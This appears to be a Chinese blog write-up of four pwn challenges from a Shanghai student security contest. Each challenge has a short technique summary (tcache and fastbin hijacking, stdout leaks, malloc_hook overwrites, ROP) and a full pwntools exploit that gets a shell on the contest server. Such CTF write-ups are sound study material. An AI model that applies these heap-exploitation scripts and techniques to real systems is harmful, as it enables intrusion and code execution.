上海大学生网络安全竞赛 pwn wp

cpu_emulator

通过越界写劫持tcache数组,在其0x80和0x40的位置填入free的got表和atoi函数的got表地址,申请的时候将free_got劫持为printf泄露libc,而后将atoi函数的got表劫持为system函数,从而获取shell,需要注意的是本题是更新过的2.27libc,因此若是直接劫持会crash
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'emulator'
elf = ELF('emulator')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  18236
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(">> ",str(idx))
def opp(payload):
    cmd(1)
    sla("size:\n",len(payload))
    sa("instruction:\n",payload)
def add1(size,payload):
    cmd(1)
    sla("size:\n",str(size))
    sa("instruction:\n",payload)
def add(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x20))
def sub(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x24))
def AND(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x30))
def OR(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x34))
def XOR(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x38))
def SHIFT(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x3c))
def read(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0x8c))
def write(idx,offset):
    return u32(p16(offset)+p8(idx)+p8(0xac))
"""
(0x3e00000 & a1) >> 21
(0x1f0000 & a1) >>16
(0xffff & a1)
"""
"""
reg[0] = 0xfffe0000
reg[0] = reg[0]+0xfdf0
reg[1] = 0x600000
reg[1] += reg[1]+0x2018
memory[reg[0]] = reg[1]
"""
free_got = 0x0000000000602018
payload = p32(add(0x04,0x10))+p32(add(0x05,0x20))+p32(add(0x06,0x60))
payload += p32(add(0x09,0x2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe20))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(add(0x04,0x58-0x20))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe00))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfdb0))
payload += p32(write(0x09,2))+p32(write(0x09,6))
opp(payload)
#rax = opcode >> 26
#rdx = rax*4
#eax = rdx+rax
#rdx = [0x401404+rdx]
#rax = 0x401404+[0x401404+4*(opcode >> 26)]
#0x400ECD

# b *0x400971
# b *0x400A2D
cmd(2)
add1(0x78,p64(elf.plt["printf"])*2)
add1(0x68,"%9$p")
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-231-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
sla("size:\n",str(0x38))
sa("instruction:\n",p64(libc_base+libc.sym["system"]))
# add1(0x38,p64(libc_base+libc.sym["system"]))
cmd("sh")


# gdb.attach(p,"""
#   b *0x400eac
# """)
p.interactive()
lgtwo

off by one 没有show,劫持stdout泄露libc,double free劫持malloc_hook,one_gadget条件不满足,需要用libc_realloc调整栈帧
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'

binary = 'pwn2'
elf = ELF('pwn2')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  45830
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(">> ",str(idx))
def add(size,payload):
    cmd(1)
    sla("size?\n",str(size))
    sa("content?\n",payload)
def free(idx):
    cmd(2)
    sla("index ?\n",str(idx))
def edit(idx,payload):
    cmd(4)
    sla("index ?\n",str(idx))
    sa("content ?\n",payload)
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#1
add(0xf8,"aaaa")#2
add(0xf8,"aaaa")#3
add(0x68,"aaaa")#4
add(0xf8,"aaaa")#5
add(0x68,"aaaa")#6
free(0)
edit(1,"a"*0x60+p64(0x70+0x100)+p8(0))
free(2)
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#2->1
add(0xf8,"aaaa")#7
free(0)
add(0x68,"aaaa")
add(0x68,"aaaa")#8
edit(8,p16(0x25dd))
free(0)
free(1)
edit(2,p8(0x70))
add(0x68,"aaa")#0
add(0x68,"aaa")#1
add(0x68,"aaa")#9
edit(9,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
free(4)
free(0)
edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"aaaa")
add(0x68,"aaaa")
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
edit(4,"a"*(0x13-0x8)+p64(libc_base+0x4527a)+p64(libc_base+libc.sym["__libc_realloc"]+0x8))
cmd(1)
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
maj0rone

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: cnitlrt
import sys
import os
from pwn import *
# context.lo1
context.log_level = 'debug'

binary = 'maj'
elf = ELF('maj')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  18523
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
o_g = [0x45226,0x4527a,0xf0364,0xf1207]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(">> ",str(idx))
def add(size,payload):
    cmd(1)
    sla('please answer the question\n',str(80))
    sla("______?\n",str(size))
    sa("yes_or_no?\n",payload)
def free(idx):
    cmd(2)
    sla("index ?\n",str(idx))
def show(idx):
    cmd(3)
    sla("index ?\n",str(idx))
def edit(idx,payload):
    cmd(4)
    sla("index ?\n",str(idx))
    sa("__new_content ?\n",payload)
add(0x28,"0")
add(0x68,"0")
add(0x68,'0')
add(0x68,'0')
add(0x68,'0')
edit(0,p64(0)+p64(0x71))
payload = p64(0)+p64(0x21)
edit(1,payload*6)
free(2)
free(1)
edit(1,'\x10')
add(0x68,"1")
add(0x68,"1")#6
payload = p64(0)*3+p64(0x70+0x71)
edit(6,payload)
free(1)
add(0x68,"a")#7
add(0x68,"a")#8->2
edit(6,payload)
free(1)
free(2)
add(0x38,"a")#9
add(0x28,"a")#10
edit(8,p16(0x25dd))
add(0x68,"a")
add(0x68,"12")
edit(12,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
libc_base = l64()-0x3c5600
lg("libc_base",libc_base)
free(3)
edit(3,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"a")
add(0x68,"14")
edit(14,"a"*0x13+p64(o_g[3]+libc_base))
cmd(1)
sla('please answer the question\n',str(80))
sla("______?\n",str(80))
# gdb.attach(p)
p.interactive()
EASY_ABNORMAL

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'

binary = 'pwn111'
elf = ELF('pwn111')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  10012
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla("E :",str(idx))
def add(payload):
    cmd(2)
    sla("cnt:\n",payload)
def free(idx):
    cmd(3)
    sla("idx:",str(idx))
def show(idx):
    cmd(4)
def gift(payload):
    cmd(23333)
    sa("INPUT:",payload)
sla("NAME: ","%11$p")
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-240-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
pop_rdi = libc_base + 0x21112
sys_addr = libc_base + libc.sym['system']
sh_addr = libc_base + libc.search("/bin/sh").next()
ret = libc_base + 0x0937
payload = p64(ret)*6+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
add(payload)
add(payload)
free(0)
free(1)
show(1)
ru("2:")
heap_base = u64(ru("\n")[:-1].ljust(8,"\x00"))
lg("heap_base",heap_base)

# gdb.attach(p)
gift("a"*0x20+p64(heap_base+0x20))
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • fireshell 2019 | pwn wp
    leakless x86 elf | nx 漏洞 : 栈溢出 利用 :使用 puts leak libc , 并第...
    fantasy_learner阅读 383评论 0 0
  • CISCN2019 国赛线上初赛pwn
    0x00 写在前面 最后一次参加国赛了额,无论队伍能否走到决赛,我都无缘参赛了,希望队伍能走的更远吧。这次国赛比起...
    Fish_o0O阅读 3,149评论 6 8
  • 安恒杯12月月赛 (pwn)
    题目链接 messageb0x 教科书般的32位栈溢出(不懂得可以看一步一步学rop 32位),首先rop利用pu...
    2mpossible阅读 1,284评论 0 6
  • 扯下窗帘,阳光倾泻而下。
    渐变的面目拼图要我怎么拼? 我是疲乏了还是投降了? 不是不允许自己坠落, 我没有滴水不进的保护膜。 就是害怕变得面...
    闷热当乘凉阅读 4,344评论 0 13
  • 0906
    感觉自己有点神经衰弱,总是觉得手机响了;屋外有人走过;每次妈妈不声不响的进房间突然跟我说话,我都会被吓得半死!一整...
    章鱼的拥抱阅读 2,205评论 4 5